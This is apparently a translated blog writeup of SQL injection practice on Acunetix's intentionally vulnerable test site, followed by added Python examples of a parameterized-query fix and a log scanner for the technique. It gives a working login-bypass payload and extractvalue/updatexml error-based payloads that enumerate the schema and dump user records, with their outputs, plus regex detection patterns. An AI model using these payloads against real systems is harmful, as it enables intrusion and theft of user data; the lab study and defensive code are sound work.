
[Acunetix Acuart] SQL Injection Practice (Error-Based SQL Injection)

Kwon Oh! JUN 2022. 11. 19. 19:03

http://testphp.vulnweb.com/index.php

 



1. Login

Expected query: select * from table where Username=' ' and password=' '

Attack query: password='' or 1=1[space]--[space]'


Logged in as test.

There is XSS code in Name, Credit card Number, E-Mail, Phone number and Address; I don't know why it was put there.

The information keeps changing when I refresh.
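As an added illustration (not code from the original post or from the Acuart site), the guessed login query above is rebuilt in Python on an in-memory SQLite table that uses the uname/pass column names from this writeup, so the section 1 payload can be run against the concatenated query and against a parameterized one. The table contents are constructed.

```python
import sqlite3

PAYLOAD = "' or 1=1 -- '"  # the login payload from section 1


def make_db() -> sqlite3.Connection:
    # Constructed stand-in for the users table (uname/pass as enumerated later).
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (uname text, pass text)")
    conn.execute("insert into users values ('test', 'test')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, uname: str, password: str):
    # The query from the writeup, built by string concatenation: the quote and
    # the trailing '--' become SQL grammar, so the WHERE clause turns into
    # (uname=... and pass='') or 1=1 -- ''  and every row matches.
    sql = f"select uname from users where uname='{uname}' and pass='{password}'"
    return conn.execute(sql).fetchone()


def login_safe(conn: sqlite3.Connection, uname: str, password: str):
    # Parameterized query: the driver binds the values, so the same payload is
    # compared literally against the pass column and matches nothing.
    sql = "select uname from users where uname=? and pass=?"
    return conn.execute(sql, (uname, password)).fetchone()


def demo():
    conn = make_db()
    vuln = login_vulnerable(conn, "nobody", PAYLOAD)  # -> ('test',)
    safe = login_safe(conn, "nobody", PAYLOAD)        # -> None
    return vuln, safe
```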


2. Update attack

Expected query: update acuart set column1 = '[]', column2 = '[]', ... where column = 'test'

Attack queries

' or extractvalue(0x0a,concat(0x0a, version(), 0x0a)) or '

' or extractvalue(0x0a,concat(0x0a, system_user(), 0x0a)) or '

' or extractvalue(0x0a,concat(0x0a, database(), 0x0a)) or '

 

' or updatexml(1,concat(0x7e, version()),0) or '
' or updatexml(1,concat(0x7e, system_user()),0) or '
' or updatexml(1,concat(0x7e, database()),0) or '

 

Both extractvalue and updatexml work.


update acuart set column1 = '' or extractvalue(0x0a,concat(0x0a, version(), 0x0a)) or '', column2 = '[]', ... where column = 'test'


Result of ' or extractvalue(0x0a,concat(0x0a,  version() , 0x0a)) or '


INPUT:  ' or extractvalue(0x0a,concat(0x0a, version(), 0x0a)) or '
OUTPUT: Unable to update user information: XPATH syntax error: ' 8.0.22-0ubuntu0.20.04.2 '

INPUT:  ' or extractvalue(0x0a,concat(0x0a, system_user(), 0x0a)) or '
OUTPUT: Unable to update user information: XPATH syntax error: ' acuart@localhost '

INPUT:  ' or extractvalue(0x0a,concat(0x0a, database(), 0x0a)) or '
OUTPUT: Unable to update user information: XPATH syntax error: ' acuart '

3. Enumerating databases

Attack query

' or updatexml(1,concat(0x7e,(select group_concat(DISTINCT(table_schema)) from information_schema.tables)),0) or '


Result of ' or updatexml(1,concat(0x7e, (select group_concat(DISTINCT(table_schema)) from information_schema.tables) ),0) or '


DATABASE
acuart
information_schema


4. Enumerating tables

Attack query

' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='acuart')),0) or '


Result of ' or updatexml(1,concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema='acuart') ),0) or '

Looking at the result, you can see that not all of the tables are printed.

 

INPUT:  ' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='acuart' limit 4,1)),0) or '
OUTPUT: Unable to update user information: XPATH syntax error: '~guestbook'

INPUT:  ' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='acuart' limit 5,1)),0) or '
OUTPUT: Unable to update user information: XPATH syntax error: '~pictures'

INPUT:  ' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='acuart' limit 6,1)),0) or '
OUTPUT: Unable to update user information: XPATH syntax error: '~product'

INPUT:  ' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='acuart' limit 7,1)),0) or '
OUTPUT: Unable to update user information: XPATH syntax error: '~users

 

Table
artists
carts
categ
featured
guestbook
pictures
prod
users

Since it's member information, wouldn't it be users? A reasonable suspicion!


5. Enumerating columns

Attack query

' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='acuart' and table_name='users')),0) or '


Just like when enumerating tables, the text gets cut off.

 

INPUT:  ' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='acuart' and table_name='users' limit 6,1)),0) or '
OUTPUT: Unable to update user information: XPATH syntax error: '~phone'

INPUT:  ' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='acuart' and table_name='users' limit 7,1)),0) or '
OUTPUT: Unable to update user information: XPATH syntax error: '~uname'

column
address
cart
cc
email
name
pass
phone
uname

 


6. Enumerating data

Attack query

' or updatexml(1,concat(0x7e,(select uname from acuart.users)),0) or '

I had been doing it that way the whole time, but it threw an error, and when I checked it turns out it has to be wrapped in a subquery...

 

 

Attack query

' or updatexml(1,concat(0x7e,(select uname from (select uname from acuart.users)a limit 0,1)),0) or '


Attack query

' or updatexml(1,concat(0x7e,(select group_concat(uname, '###', cc, '###', address, '###', email, '###', name, '###', pass, '###', phone, '###') from (select uname, cc, address, email, name, pass, phone from acuart.users)a limit 0,1)),0) or '

 

As you may have noticed while enumerating the tables and columns, the amount of text that gets printed is fixed, so doing it that way is no use.

INPUT:  ' or updatexml(1,concat(0x7e,(select group_concat(uname) from (select uname from acuart.users)a)),0) or '
OUTPUT: Unable to update user information: XPATH syntax error: '~test'

INPUT:  ' or updatexml(1,concat(0x7e,(select group_concat(cc) from (select cc from acuart.users)a)),0) or '
OUTPUT: Unable to update user information: XPATH syntax error: '~1234-5678-2300-9000'

INPUT:  ' or updatexml(1,concat(0x7e,(select group_concat(address) from (select address from acuart.users)a)),0) or '
OUTPUT: Unable to update user information: XPATH syntax error: '~21 street'

INPUT:  ' or updatexml(1,concat(0x7e,(select group_concat(email) from (select email from acuart.users)a)),0) or '
OUTPUT: Unable to update user information: XPATH syntax error: '~email@email.com'

INPUT:  ' or updatexml(1,concat(0x7e,(select group_concat(name) from (select name from acuart.users)a)),0) or '
OUTPUT: Unable to update user information: XPATH syntax error: '~Anonymous'

INPUT:  ' or updatexml(1,concat(0x7e,(select group_concat(pass) from (select pass from acuart.users)a)),0) or '
OUTPUT: Unable to update user information: XPATH syntax error: '~test'

INPUT:  ' or updatexml(1,concat(0x7e,(select group_concat(phone) from (select phone from acuart.users)a)),0) or '
OUTPUT: Unable to update user information: XPATH syntax error: '~2323345'

I used group_concat(), but only one row of data comes out.

uname | cc                  | address   | email           | name      | pass | phone
test  | 1234-5678-2300-9000 | 21 street | email@email.com | Anonymous | test | 2323345
null  | null                | null      | null            | null      | null | null
...   | ...                 | ...       | ...             | ...       | ...  | ...

The profile information keeps changing when I refresh; it seems to be set up to change randomly in the DB.
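Added detection example, not from the original post or the Acuart application: a log scanner for the pattern used in sections 2 to 6, flagging submitted values that call extractvalue/updatexml or read information_schema, and flagging "XPATH syntax error" messages that reached the user, since that echoed error text is the channel the data leaks through. The log line format and the sample lines are constructed for this example.

```python
import re
from typing import Optional
from urllib.parse import unquote_plus

# Signatures of the technique in sections 2 to 6: XML functions abused to
# raise an error, and information_schema reads used for enumeration.
PAYLOAD_RE = re.compile(
    r"\b(extractvalue|updatexml)\s*\(|\binformation_schema\.(tables|columns)\b",
    re.IGNORECASE,
)
# The leaked value sits between the quotes of the MySQL error the app echoed.
XPATH_ERR_RE = re.compile(r"XPATH syntax error: '(?P<leak>[^']*)'")
# Hypothetical app log format: "... field=<name> value=<urlencoded> status=<s> [msg=<text>]"
LINE_RE = re.compile(
    r"field=(?P<field>\S+) value=(?P<value>\S+) status=(?P<status>\S+)(?: msg=(?P<msg>.*))?$"
)

# Constructed sample lines: one benign update, then two from the error-based chain.
SAMPLE_LOG = [
    "2022-11-19 19:03:01 uname=test field=address value=21+street status=ok",
    "2022-11-19 19:03:40 uname=test field=address "
    "value=%27+or+updatexml%281%2Cconcat%280x7e%2C+database%28%29%29%2C0%29+or+%27 "
    "status=error msg=Unable to update user information: XPATH syntax error: '~acuart'",
    "2022-11-19 19:04:12 uname=test field=address "
    "value=%27+or+updatexml%281%2Cconcat%280x7e%2C%28select+group_concat%28table_name%29"
    "+from+information_schema.tables+where+table_schema%3D%27acuart%27%29%29%2C0%29+or+%27 "
    "status=error msg=Unable to update user information: XPATH syntax error: '~artists,carts,categ,featured,g'",
]


def scan_line(line: str) -> Optional[dict]:
    """Return a finding for one log line, or None if nothing suspicious."""
    m = LINE_RE.search(line)
    if not m:
        return None
    value = unquote_plus(m["value"])  # decode before matching, as a WAF/IDS must
    finding = {"field": m["field"], "reasons": [], "leak": None}
    if PAYLOAD_RE.search(value):
        finding["reasons"].append("error-based SQLi signature in input")
    if m["msg"]:
        err = XPATH_ERR_RE.search(m["msg"])
        if err:
            # The DB error reached the user: the error channel is open and data leaked.
            finding["reasons"].append("XPATH syntax error surfaced to user")
            finding["leak"] = err["leak"].strip("~ ")
    return finding if finding["reasons"] else None


def scan(lines):
    """Scan many lines; benign lines produce no finding."""
    return [f for f in (scan_line(ln) for ln in lines) if f]
```

The same rule set applies to a reverse proxy or WAF placed in front of the form; the fix on the application side is the parameterized query plus a generic error page, so the "XPATH syntax error" text never reaches the client.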